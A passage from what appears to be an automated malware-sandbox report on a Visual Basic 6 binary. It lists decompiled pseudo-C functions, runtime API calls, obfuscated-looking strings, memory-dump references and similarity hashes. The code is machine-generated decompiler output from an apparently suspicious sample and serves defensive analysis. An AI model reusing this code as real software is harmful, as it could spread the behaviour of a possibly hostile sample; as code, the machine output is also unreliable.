					asm("fclex");
					_v180 = _t104;
					if(_v180 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x403568);
						_push(_v176);
						_push(_v180);
						L00401800();
						_v212 = _t104;
					}
					if( *0x435744 != 0) {
						_v216 = 0x435744;
					} else {
						_push(0x435744);
						_push(0x40342c);
						L00401812();
						_v216 = 0x435744;
					}
					_t43 =  &_v216; // 0x435744
					_v184 =  *((intOrPtr*)( *_t43));
					_v132 = _v164;
					_v140 = 3;
					_v116 = _v160;
					_v124 = 3;
					_v100 = 0x18;
					_v108 = 2;
					_v84 = 0x2d5f8e;
					_v92 = 3;
					_v68 = L"Strkmarchernes7";
					_v76 = 8;
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 =  *((intOrPtr*)( *_v184 + 0x44))(_v184, 0x10, 0x10, 0x10, 0x10, 0x10,  &_v44);
					asm("fclex");
					_v188 = _t117;
					if(_v188 >= 0) {
						_v220 = _v220 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x40341c);
						_push(_v184);
						_push(_v188);
						L00401800();
						_v220 = _t117;
					}
					_v196 = _v44;
					_v44 = _v44 & 0x00000000;
					_v52 = _v196;
					_v60 = 9;
					_push(0x10);
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v28);
					L004017A6();
					_push( &_v40);
					_t88 =  &_v36;
					_push(_t88);
					_push(2);
					L004017A0();
					L00401824();
				}
				asm("wait");
				_push(0x42c26d);
				L0040182A();
				L004017FA();
				return _t88;
			}

0x0042bf11
0x0042bf1c
0x0042bf1d
0x0042bf24
0x0042bf29
0x0042bf31
0x0042bf34
0x0042bf41
0x0042bf46
0x0042bf4b
0x0042bf50
0x0042bf52
0x0042bf5b
0x0042bf68
0x0042bf85
0x0042bf6a
0x0042bf6a
0x0042bf6f
0x0042bf74
0x0042bf79
0x0042bf79
0x0042bfa9
0x0042bfad
0x0042bfb2
0x0042bfcd
0x0042bfd0
0x0042bfd2
0x0042bfdf
0x0042c001
0x0042bfe1
0x0042bfe1
0x0042bfe3
0x0042bfe8
0x0042bfee
0x0042bff4
0x0042bff9
0x0042bff9
0x0042c00f
0x0042c02c
0x0042c011
0x0042c011
0x0042c016
0x0042c01b
0x0042c020
0x0042c020
0x0042c050
0x0042c054
0x0042c059
0x0042c074
0x0042c07a
0x0042c07c
0x0042c089
0x0042c0ae
0x0042c08b
0x0042c08b
0x0042c090
0x0042c095
0x0042c09b
0x0042c0a1
0x0042c0a6
0x0042c0a6
0x0042c0bc
0x0042c0d9
0x0042c0be
0x0042c0be
0x0042c0c3
0x0042c0c8
0x0042c0cd
0x0042c0cd
0x0042c0e3
0x0042c0eb
0x0042c0f7
0x0042c0fa
0x0042c10a
0x0042c10d
0x0042c114
0x0042c11b
0x0042c122
0x0042c129
0x0042c130
0x0042c137
0x0042c145
0x0042c152
0x0042c153
0x0042c154
0x0042c155
0x0042c159
0x0042c163
0x0042c164
0x0042c165
0x0042c166
0x0042c16a
0x0042c174
0x0042c175
0x0042c176
0x0042c177
0x0042c17b
0x0042c185
0x0042c186
0x0042c187
0x0042c188
0x0042c18c
0x0042c196
0x0042c197
0x0042c198
0x0042c199
0x0042c1a8
0x0042c1ab
0x0042c1ad
0x0042c1ba
0x0042c1dc
0x0042c1bc
0x0042c1bc
0x0042c1be
0x0042c1c3
0x0042c1c9
0x0042c1cf
0x0042c1d4
0x0042c1d4
0x0042c1e6
0x0042c1ec
0x0042c1f6
0x0042c1f9
0x0042c200
0x0042c203
0x0042c20d
0x0042c20e
0x0042c20f
0x0042c210
0x0042c211
0x0042c213
0x0042c216
0x0042c21e
0x0042c21f
0x0042c222
0x0042c223
0x0042c225
0x0042c230
0x0042c230
0x0042c235
0x0042c236
0x0042c25f
0x0042c267
0x0042c26c

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042BF29
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 0042BF41
__vbaStrComp.MSVBVM60(00000000,00403738,00403758,?,?,?,?,004015F6), ref: 0042BF52
__vbaNew2.MSVBVM60(00402614,00435010,00000000,00403738,00403758,?,?,?,?,004015F6), ref: 0042BF74
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042BFAD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,00000068), ref: 0042BFF4
__vbaNew2.MSVBVM60(00402614,00435010), ref: 0042C01B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042C054
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,00000118), ref: 0042C0A1
__vbaNew2.MSVBVM60(0040342C,00435744), ref: 0042C0C8
__vbaChkstk.MSVBVM60(?), ref: 0042C145
__vbaChkstk.MSVBVM60(?), ref: 0042C159
__vbaChkstk.MSVBVM60(?), ref: 0042C16A
__vbaChkstk.MSVBVM60(?), ref: 0042C17B
__vbaChkstk.MSVBVM60(?), ref: 0042C18C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,00000044), ref: 0042C1CF
__vbaChkstk.MSVBVM60(00000000,?,0040341C,00000044), ref: 0042C203
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 0042C216
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,00000000), ref: 0042C225
__vbaFreeVar.MSVBVM60 ref: 0042C230
__vbaFreeStr.MSVBVM60(0042C26D,00000000,00403738,00403758,?,?,?,?,004015F6), ref: 0042C25F
__vbaFreeObj.MSVBVM60(0042C26D,00000000,00403738,00403758,?,?,?,?,004015F6), ref: 0042C267

Strings

DWC, xrefs: 0042C0E3
Strkmarchernes7, xrefs: 0042C130

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$Free$CheckHresultNew2$CompCopyLateList
String ID: DWC$Strkmarchernes7
API String ID: 368050653-1184458128
Opcode ID: d058e48c354a7abe218945c4e78a4da13a6cbc6df432fccb74a9f0492eb9f09e
Instruction ID: 3935d183507c4f42afecdb07cfdf17663128485491f292f43420bf958da07dda
Opcode Fuzzy Hash: d058e48c354a7abe218945c4e78a4da13a6cbc6df432fccb74a9f0492eb9f09e
Instruction Fuzzy Hash: D9915C75A00628EFDB20EF90CC45B8DB7B6BF09304F5040AAF509BB291C7B95A85DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00432F6F, Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00432F6F(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				char _v52;
				char _v56;
				char _v72;
				char _v88;
				void* _v108;
				signed int _v112;
				intOrPtr* _v120;
				signed int _v124;
				signed int _t44;
				char* _t48;
				char* _t52;
				signed int _t56;
				char* _t57;
				intOrPtr _t87;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t87;
				_t44 = 0x68;
				L004015F0();
				_v12 = _t87;
				_v8 = 0x401510;
				L00401794();
				L0040178E();
				_push(1);
				_push(_v44);
				L004016E6();
				L0040183C();
				_push(_t44);
				_push(0x4041d0);
				L004017F4();
				asm("sbb eax, eax");
				_v108 =  ~( ~( ~_t44));
				L0040182A();
				_t48 = _v108;
				if(_t48 != 0) {
					if( *0x435010 != 0) {
						_v120 = 0x435010;
					} else {
						_push(0x435010);
						_push(0x402614);
						L00401812();
						_v120 = 0x435010;
					}
					_t52 =  &_v52;
					L0040180C();
					_v108 = _t52;
					_t56 =  *((intOrPtr*)( *_v108 + 0x130))(_v108,  &_v56, _t52,  *((intOrPtr*)( *((intOrPtr*)( *_v120)) + 0x314))( *_v120));
					asm("fclex");
					_v112 = _t56;
					if(_v112 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x403568);
						_push(_v108);
						_push(_v112);
						L00401800();
						_v124 = _t56;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(_v56);
					_t57 =  &_v72;
					_push(_t57);
					L00401788();
					_push(_t57);
					L0040177C();
					L0040183C();
					_push(_t57);
					_push( &_v88);
					L004016E0();
					_push(0x10);
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v40);
					L004017A6();
					L0040182A();
					_push( &_v56);
					_push( &_v52);
					_push(2);
					L004017A0();
					_push( &_v88);
					_t48 =  &_v72;
					_push(_t48);
					_push(2);
					L00401842();
				}
				_push(0x433139);
				L00401824();
				L004017FA();
				L0040182A();
				return _t48;
			}

0x00432f74
0x00432f7f
0x00432f80
0x00432f89
0x00432f8a
0x00432f92
0x00432f95
0x00432fa2
0x00432faf
0x00432fb4
0x00432fb6
0x00432fb9
0x00432fc3
0x00432fc8
0x00432fc9
0x00432fce
0x00432fd5
0x00432fdb
0x00432fe2
0x00432fe7
0x00432fed
0x00432ffa
0x00433014
0x00432ffc
0x00432ffc
0x00433001
0x00433006
0x0043300b
0x0043300b
0x0043302f
0x00433033
0x00433038
0x00433047
0x0043304d
0x0043304f
0x00433056
0x00433072
0x00433058
0x00433058
0x0043305d
0x00433062
0x00433065
0x00433068
0x0043306d
0x0043306d
0x00433076
0x00433078
0x0043307a
0x0043307c
0x0043307f
0x00433082
0x00433083
0x0043308b
0x0043308c
0x00433096
0x0043309b
0x0043309f
0x004330a0
0x004330a5
0x004330a8
0x004330b2
0x004330b3
0x004330b4
0x004330b5
0x004330b6
0x004330b8
0x004330bb
0x004330c3
0x004330cb
0x004330cf
0x004330d0
0x004330d2
0x004330dd
0x004330de
0x004330e1
0x004330e2
0x004330e4
0x004330e9
0x004330ec
0x00433123
0x0043312b
0x00433133
0x00433138

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00432F8A
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 00432FA2
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00432FAF
#618.MSVBVM60(?,00000001,?,?,?,?,004015F6), ref: 00432FB9
__vbaStrMove.MSVBVM60(?,00000001,?,?,?,?,004015F6), ref: 00432FC3
__vbaStrCmp.MSVBVM60(004041D0,00000000,?,00000001,?,?,?,?,004015F6), ref: 00432FCE
__vbaFreeStr.MSVBVM60(004041D0,00000000,?,00000001,?,?,?,?,004015F6), ref: 00432FE2
__vbaNew2.MSVBVM60(00402614,00435010,004041D0,00000000,?,00000001,?,?,?,?,004015F6), ref: 00433006
__vbaObjSet.MSVBVM60(?,00000000), ref: 00433033
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,00000130), ref: 00433068
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,00000000), ref: 00433083
__vbaStrVarMove.MSVBVM60(00000000), ref: 0043308C
__vbaStrMove.MSVBVM60(00000000), ref: 00433096
#716.MSVBVM60(?,00000000,00000000), ref: 004330A0
__vbaChkstk.MSVBVM60(?,00000000,00000000), ref: 004330A8
__vbaLateIdSt.MSVBVM60(?,00000000,?,00000000,00000000), ref: 004330BB
__vbaFreeStr.MSVBVM60(?,00000000,?,00000000,00000000), ref: 004330C3
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,00000000,?,00000000,00000000), ref: 004330D2
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,00000000,00000000), ref: 004330E4
__vbaFreeVar.MSVBVM60(00433139,004041D0,00000000,?,00000001,?,?,?,?,004015F6), ref: 00433123
__vbaFreeObj.MSVBVM60(00433139,004041D0,00000000,?,00000001,?,?,?,?,004015F6), ref: 0043312B
__vbaFreeStr.MSVBVM60(00433139,004041D0,00000000,?,00000001,?,?,?,?,004015F6), ref: 00433133

Strings

ABC, xrefs: 00432FA7

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$ChkstkLateList$#618#716CallCheckCopyHresultNew2
String ID: ABC
API String ID: 1772627003-2743272264
Opcode ID: 61f15ad9da560e511252edb0ac4d4fe6439f8ad238b0e46989799ac4ce983af7
Instruction ID: a7247ce7db71adcb492209f7c2739c125e50e3116555db0e3ccb9432c9419da2
Opcode Fuzzy Hash: 61f15ad9da560e511252edb0ac4d4fe6439f8ad238b0e46989799ac4ce983af7
Instruction Fuzzy Hash: F6412F72D40208ABDB15EFA1CD46BDE77B9AF48704F20453AF101BB1E1DB795A05CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00427CE0, Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00427CE0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, char __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				intOrPtr _v28;
				char _v44;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				void* _v116;
				signed int _v120;
				signed int _v128;
				char _v132;
				signed int _v136;
				char* _t54;
				short _t55;
				char* _t57;
				char* _t60;
				char* _t61;
				signed int _t64;
				intOrPtr _t75;
				void* _t76;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t75;
				_push(0x74);
				L004015F0();
				_v12 = _t75;
				_v8 = 0x401200;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				_push( &_v80);
				_push( &_v64);
				asm("fld1");
				_v48 = __fp0;
				asm("fld1");
				_v56 = __fp0;
				asm("fld1");
				_v64 = __fp0;
				L004017CA();
				L0040184E();
				asm("fcomp qword [0x4011b0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t10 =  &_v128;
					 *_t10 = _v128 & 0x00000000;
					__eflags =  *_t10;
				} else {
					_v128 = 1;
				}
				_v116 =  ~_v128;
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401842();
				_t76 = _t75 + 0xc;
				if(_v116 != 0) {
					if( *0x435744 != 0) {
						_v132 = 0x435744;
					} else {
						_push(0x435744);
						_push(0x40342c);
						L00401812();
						_v132 = 0x435744;
					}
					_t19 =  &_v132; // 0x435744
					_v116 =  *((intOrPtr*)( *_t19));
					_t60 =  &_v64;
					L004017B8();
					_t76 = _t76 + 0x10;
					L004017BE();
					_t61 =  &_v48;
					L004017C4();
					_t64 =  *((intOrPtr*)( *_v116 + 0xc))(_v116, _t61, _t61, _t60, _t60, _t60, _v28, L"zfKhzdfUx02iid82n246", 0);
					asm("fclex");
					_v120 = _t64;
					if(_v120 >= 0) {
						_t32 =  &_v136;
						 *_t32 = _v136 & 0x00000000;
						__eflags =  *_t32;
					} else {
						_push(0xc);
						_push(0x40341c);
						_push(_v116);
						_push(_v120);
						L00401800();
						_v136 = _t64;
					}
					L004017FA();
					L00401824();
				}
				_push(0);
				_push(L"MousePointer");
				_push(0);
				_push(L"Opsione17");
				_push( &_v44);
				_t54 =  &_v64;
				_push(_t54);
				L00401830();
				_push(_t54);
				_t55 =  &_v80;
				_push(_t55);
				L004017E8();
				_push(_t55);
				L004017DC();
				_v24 = _t55;
				_push( &_v80);
				_t57 =  &_v64;
				_push(_t57);
				_push(2);
				L00401842();
				asm("wait");
				_push(0x427ea8);
				L004017FA();
				L00401824();
				return _t57;
			}

0x00427ce5
0x00427cf0
0x00427cf1
0x00427cf8
0x00427cfb
0x00427d03
0x00427d06
0x00427d0d
0x00427d14
0x00427d1b
0x00427d22
0x00427d2c
0x00427d30
0x00427d31
0x00427d35
0x00427d38
0x00427d3c
0x00427d3f
0x00427d43
0x00427d46
0x00427d4b
0x00427d50
0x00427d56
0x00427d58
0x00427d59
0x00427d64
0x00427d64
0x00427d64
0x00427d5b
0x00427d5b
0x00427d5b
0x00427d6d
0x00427d74
0x00427d78
0x00427d79
0x00427d7b
0x00427d80
0x00427d89
0x00427d96
0x00427db0
0x00427d98
0x00427d98
0x00427d9d
0x00427da2
0x00427da7
0x00427da7
0x00427db7
0x00427dbc
0x00427dc9
0x00427dcd
0x00427dd2
0x00427dd6
0x00427ddc
0x00427de0
0x00427dee
0x00427df1
0x00427df3
0x00427dfa
0x00427e16
0x00427e16
0x00427e16
0x00427dfc
0x00427dfc
0x00427dfe
0x00427e03
0x00427e06
0x00427e09
0x00427e0e
0x00427e0e
0x00427e20
0x00427e28
0x00427e28
0x00427e2d
0x00427e2f
0x00427e34
0x00427e36
0x00427e3e
0x00427e3f
0x00427e42
0x00427e43
0x00427e4b
0x00427e4c
0x00427e4f
0x00427e50
0x00427e58
0x00427e59
0x00427e5e
0x00427e65
0x00427e66
0x00427e69
0x00427e6a
0x00427e6c
0x00427e74
0x00427e75
0x00427e9a
0x00427ea2
0x00427ea7

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00427CFB
#679.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00427D46
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00427D4B
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00427D7B
__vbaNew2.MSVBVM60(0040342C,00435744), ref: 00427DA2
__vbaLateMemCallLd.MSVBVM60(?,?,zfKhzdfUx02iid82n246,00000000), ref: 00427DCD
__vbaObjVar.MSVBVM60(00000000), ref: 00427DD6
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 00427DE0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,0000000C), ref: 00427E09
__vbaFreeObj.MSVBVM60(00000000,?,0040341C,0000000C), ref: 00427E20
__vbaFreeVar.MSVBVM60(00000000,?,0040341C,0000000C), ref: 00427E28
__vbaVarLateMemCallLdRf.MSVBVM60(?,?,Opsione17,00000000,MousePointer,00000000), ref: 00427E43
__vbaVarLateMemCallLd.MSVBVM60(?,00000000,?,?,MousePointer,00000000), ref: 00427E50
__vbaI2Var.MSVBVM60(00000000,?,?,?,?,?,?,MousePointer,00000000), ref: 00427E59
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,?,?,?,?,?,MousePointer,00000000), ref: 00427E6C
__vbaFreeObj.MSVBVM60(00427EA8,?,?,00000000,?,?,?,?,?,?,MousePointer,00000000), ref: 00427E9A
__vbaFreeVar.MSVBVM60(00427EA8,?,?,00000000,?,?,?,?,?,?,MousePointer,00000000), ref: 00427EA2

Strings

zfKhzdfUx02iid82n246, xrefs: 00427DC1
Opsione17, xrefs: 00427E36
DWC, xrefs: 00427DB7
MousePointer, xrefs: 00427E2F

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CallLate$List$#679AddrefCheckChkstkHresultNew2
String ID: DWC$MousePointer$Opsione17$zfKhzdfUx02iid82n246
API String ID: 2733606301-308145975
Opcode ID: be473aa5a04582526f91fde873e532f36c6d3d246e9e10f0306d14c1c8bdadc2
Instruction ID: f02dcc55ee8b98519c13c5e11283cf037213702ff1194ceb43359acb812cbd06
Opcode Fuzzy Hash: be473aa5a04582526f91fde873e532f36c6d3d246e9e10f0306d14c1c8bdadc2
Instruction Fuzzy Hash: 274130B1D50218AADB11EBA1DC46FEEB7BCEF04704F10812FF101B71A2DB7956059B69

Uniqueness

Uniqueness Score: -1.00%

Function 0042C43D, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0042C43D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v32;
				void* _v48;
				signed int _v52;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				intOrPtr _v160;
				char _v168;
				intOrPtr* _v268;
				signed int _v272;
				intOrPtr* _v276;
				signed int _v280;
				short _v284;
				signed int _v292;
				char _v296;
				signed int _v300;
				signed int _v304;
				intOrPtr* _v308;
				signed int _v312;
				signed int _t100;
				signed int _t105;
				char* _t109;
				char* _t113;
				signed int _t117;
				intOrPtr _t151;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t151;
				L004015F0();
				_v12 = _t151;
				_v8 = 0x401400;
				L00401794();
				if( *0x435744 != 0) {
					_v296 = 0x435744;
				} else {
					_push(0x435744);
					_push(0x40342c);
					L00401812();
					_v296 = 0x435744;
				}
				_t7 =  &_v296; // 0x435744
				_v268 =  *((intOrPtr*)( *_t7));
				_t100 =  *((intOrPtr*)( *_v268 + 0x14))(_v268,  &_v56);
				asm("fclex");
				_v272 = _t100;
				if(_v272 >= 0) {
					_v300 = _v300 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40341c);
					_push(_v268);
					_push(_v272);
					L00401800();
					_v300 = _t100;
				}
				_v276 = _v56;
				_t105 =  *((intOrPtr*)( *_v276 + 0x50))(_v276,  &_v52);
				asm("fclex");
				_v280 = _t105;
				if(_v280 >= 0) {
					_v304 = _v304 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x403784);
					_push(_v276);
					_push(_v280);
					L00401800();
					_v304 = _t105;
				}
				_push(_v52);
				_push(0);
				L004017F4();
				asm("sbb eax, eax");
				_v284 =  ~( ~_t105 + 1);
				L0040182A();
				L004017FA();
				_t109 = _v284;
				if(_t109 != 0) {
					_v160 = 0x80020004;
					_v168 = 0xa;
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					if( *0x435010 != 0) {
						_v308 = 0x435010;
					} else {
						_push(0x435010);
						_push(0x402614);
						L00401812();
						_v308 = 0x435010;
					}
					_t113 =  &_v56;
					L0040180C();
					_v268 = _t113;
					_t117 =  *((intOrPtr*)( *_v268 + 0x50))(_v268,  &_v52, _t113,  *((intOrPtr*)( *((intOrPtr*)( *_v308)) + 0x30c))( *_v308));
					asm("fclex");
					_v272 = _t117;
					if(_v272 >= 0) {
						_v312 = _v312 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x403568);
						_push(_v268);
						_push(_v272);
						L00401800();
						_v312 = _t117;
					}
					_v292 = _v52;
					_v52 = _v52 & 0x00000000;
					_v64 = _v292;
					_v72 = 8;
					_push( &_v168);
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					L00401836();
					L0040183C();
					L004017FA();
					_push( &_v168);
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_t109 =  &_v72;
					_push(_t109);
					_push(7);
					L00401842();
				}
				asm("wait");
				_push(0x42c775);
				L0040182A();
				L00401824();
				return _t109;
			}

0x0042c442
0x0042c44d
0x0042c44e
0x0042c45a
0x0042c462
0x0042c465
0x0042c472
0x0042c47e
0x0042c49b
0x0042c480
0x0042c480
0x0042c485
0x0042c48a
0x0042c48f
0x0042c48f
0x0042c4a5
0x0042c4ad
0x0042c4c5
0x0042c4c8
0x0042c4ca
0x0042c4d7
0x0042c4f9
0x0042c4d9
0x0042c4d9
0x0042c4db
0x0042c4e0
0x0042c4e6
0x0042c4ec
0x0042c4f1
0x0042c4f1
0x0042c503
0x0042c51b
0x0042c51e
0x0042c520
0x0042c52d
0x0042c54f
0x0042c52f
0x0042c52f
0x0042c531
0x0042c536
0x0042c53c
0x0042c542
0x0042c547
0x0042c547
0x0042c556
0x0042c559
0x0042c55b
0x0042c562
0x0042c567
0x0042c571
0x0042c579
0x0042c57e
0x0042c587
0x0042c58d
0x0042c597
0x0042c5a1
0x0042c5ab
0x0042c5b5
0x0042c5bc
0x0042c5c6
0x0042c5cd
0x0042c5d4
0x0042c5db
0x0042c5e2
0x0042c5e9
0x0042c5f7
0x0042c614
0x0042c5f9
0x0042c5f9
0x0042c5fe
0x0042c603
0x0042c608
0x0042c608
0x0042c638
0x0042c63c
0x0042c641
0x0042c659
0x0042c65c
0x0042c65e
0x0042c66b
0x0042c68d
0x0042c66d
0x0042c66d
0x0042c66f
0x0042c674
0x0042c67a
0x0042c680
0x0042c685
0x0042c685
0x0042c697
0x0042c69d
0x0042c6a7
0x0042c6aa
0x0042c6b7
0x0042c6be
0x0042c6c5
0x0042c6c9
0x0042c6cd
0x0042c6d1
0x0042c6d5
0x0042c6d6
0x0042c6e0
0x0042c6e8
0x0042c6f3
0x0042c6fa
0x0042c701
0x0042c705
0x0042c709
0x0042c70d
0x0042c70e
0x0042c711
0x0042c712
0x0042c714
0x0042c719
0x0042c71c
0x0042c71d
0x0042c767
0x0042c76f
0x0042c774

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042C45A
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 0042C472
__vbaNew2.MSVBVM60(0040342C,00435744,?,?,?,?,004015F6), ref: 0042C48A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,00000014), ref: 0042C4EC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403784,00000050), ref: 0042C542
__vbaStrCmp.MSVBVM60(00000000,?), ref: 0042C55B
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0042C571
__vbaFreeObj.MSVBVM60(00000000,?), ref: 0042C579
__vbaNew2.MSVBVM60(00402614,00435010,00000000,?), ref: 0042C603
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042C63C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,00000050), ref: 0042C680
#596.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0042C6D6
__vbaStrMove.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0042C6E0
__vbaFreeObj.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0042C6E8
__vbaFreeVarList.MSVBVM60(00000007,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0042C714
__vbaFreeStr.MSVBVM60(0042C775,00000000,?), ref: 0042C767
__vbaFreeVar.MSVBVM60(0042C775,00000000,?), ref: 0042C76F

Strings

DWC, xrefs: 0042C4A5

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$#596ChkstkListMove
String ID: DWC
API String ID: 1405758147-2466064311
Opcode ID: 95f699319a51d63036829f02229290f6f0060eed43e20d9c328bcfe6381b302a
Instruction ID: c3dd4d663b0de4fb5432f7bc8650361c1832c24ed2e1aa7a25da80d8e348125e
Opcode Fuzzy Hash: 95f699319a51d63036829f02229290f6f0060eed43e20d9c328bcfe6381b302a
Instruction Fuzzy Hash: E581F7B1900228AFDB21DF91DD85BDDB7B8AB08304F1081AAE149B7191DBB85B84DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0042C790, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0042C790(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v52;
				signed int _v64;
				char _v68;
				intOrPtr _v76;
				char _v84;
				intOrPtr _v92;
				char _v100;
				intOrPtr _v108;
				char _v116;
				intOrPtr _v124;
				char _v132;
				void* _v184;
				signed int _v188;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _t59;
				char* _t63;
				char* _t67;
				signed int _t71;
				intOrPtr _t101;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				L004015F0();
				_v12 = _t101;
				_v8 = 0x401410;
				L00401794();
				L00401794();
				_v76 = 0x5437;
				_v84 = 2;
				_t59 =  &_v84;
				_push(_t59);
				L004017EE();
				L0040183C();
				_push(_t59);
				_push(L"Integer");
				L004017F4();
				asm("sbb eax, eax");
				_v184 =  ~( ~( ~_t59));
				L0040182A();
